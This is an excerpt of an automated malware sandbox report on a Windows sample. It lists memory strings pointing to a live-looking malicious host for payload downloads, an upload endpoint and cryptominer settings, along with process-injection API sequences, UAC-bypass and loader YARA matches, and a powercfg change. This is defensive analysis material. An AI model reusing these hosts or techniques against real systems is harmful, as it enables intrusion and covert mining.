                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://woo097878781.win
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: powershell.exe, 0000000C.00000002.1932629434.0000029E65DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023855822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win
                    Source: explorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/
                    Source: downloaded_file.exeString found in binary or memory: https://woo097878781.win/32.EXE
                    Source: powershell.exe, 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F5E000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000376000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M
                    Source: explorer.exe, explorer.exe, 00000010.00000003.2038161328.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015592624.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXE
                    Source: downloaded_file.exe, 0000000D.00000003.1947121395.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-
                    Source: explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php6
                    Source: explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpJWO
                    Source: explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpProvider
                    Source: explorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpyeerysyjbfoqmofc
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/8p
                    Source: explorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/C
                    Source: downloaded_file.exe, 0000000D.00000003.1947121395.000000000105E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934426792.0000000002E06000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exe
                    Source: explorer.exe, 00000010.00000002.2934582465.00000000030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1
                    Source: powershell.exe, 0000000C.00000002.1939596081.0000029E75EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F59000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000371000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642019432.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023854E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/downloaded_file.bin
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/r
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/rdpi2
                    Source: explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/upload.php
                    Source: explorer.exe, 00000012.00000003.2618390437.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2689278327.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618618812.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/upload.php
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/upload.phpZ
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49764 version: TLS 1.2
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E12310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread,16_2_00E12310
                    Source: explorer.exe, 00000010.00000002.2934846757.0000000003930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ENCMARK RegisterRawInputDevicesmemstr_009c8cf7-4

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 18.2.explorer.exe.22c0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                    Source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.downloaded_file.exe.fedfd8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000013.00000002.2048053802.0000016DE6950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000001F.00000002.2064926837.000001677A63A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 00000013.00000002.2047498175.0000016DE6452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: 0000001F.00000002.2065257681.000001677A8C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\downloaded_file.exeJump to dropped file
                    Uses powercfg.exe to modify the power settings
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_003138D0 GetCurrentProcess,Wow64DisableWow64FsRedirection,_memset,lstrcpyW,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,_memmove,_memmove,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,_memmove,CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,Wow64DisableWow64FsRedirection,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,Wow64DisableWow64FsRedirection,13_2_003138D0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0030A1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,13_2_0030A1B0
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_003144B0 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,13_2_003144B0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E10740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,16_2_00E10740
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E111A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,16_2_00E111A4
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E07940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess,16_2_00E07940
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6BC85B9 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,19_2_0000016DE6BC85B9
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE86C1394 NtWriteFile,19_2_0000016DE86C1394
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB85B9 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,31_2_000001677ADB85B9
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677C7E1394 NtCreatePartition,31_2_000001677C7E1394
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeFile created: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00000001400130210_2_0000000140013021
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00000001400135070_2_0000000140013507
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00000001400102100_2_0000000140010210
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00000001400152200_2_0000000140015220
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000000014000EA480_2_000000014000EA48
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0000000140014E800_2_0000000140014E80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0000000140014E900_2_0000000140014E90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0000000140012E970_2_0000000140012E97
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0000000140015F300_2_0000000140015F30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000000014000B7580_2_000000014000B758
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00000001400137980_2_0000000140013798
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0032482713_2_00324827
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0032581413_2_00325814
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0032505A13_2_0032505A
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_003301AF13_2_003301AF
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00331B1413_2_00331B14
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0032542C13_2_0032542C
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0032FC5E13_2_0032FC5E
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00324CBC13_2_00324CBC
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00330DDC13_2_00330DDC
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031169013_2_00311690
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031AE8013_2_0031AE80
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031AED913_2_0031AED9
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0033070013_2_00330700
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0100016_2_00E01000
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2221016_2_00E22210
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E19CB016_2_00E19CB0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E04DA016_2_00E04DA0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E25D2016_2_00E25D20
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E07EF016_2_00E07EF0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1074016_2_00E10740
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0E8C016_2_00E0E8C0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0A8C016_2_00E0A8C0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0B8B016_2_00E0B8B0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2E88C16_2_00E2E88C
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2F83416_2_00E2F834
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E339FC16_2_00E339FC
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0794016_2_00E07940
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2CAFC16_2_00E2CAFC
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E352C816_2_00E352C8
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E112B016_2_00E112B0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2228616_2_00E22286
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E29BEC16_2_00E29BEC
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0CBF016_2_00E0CBF0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E35B2C16_2_00E35B2C
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1ACE016_2_00E1ACE0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1A4A016_2_00E1A4A0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1C49116_2_00E1C491
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1C41016_2_00E1C410
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E365D816_2_00E365D8
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1269016_2_00E12690
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E2266016_2_00E22660
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E0DE2016_2_00E0DE20
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1CFC016_2_00E1CFC0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C93C018_2_022C93C0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C100018_2_022C1000
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C664018_2_022C6640
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C34B018_2_022C34B0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C6E7018_2_022C6E70
                    Source: C:\Windows\explorer.exeCode function: 18_2_023802A018_2_023802A0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022D629018_2_022D6290
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238B0E018_2_0238B0E0
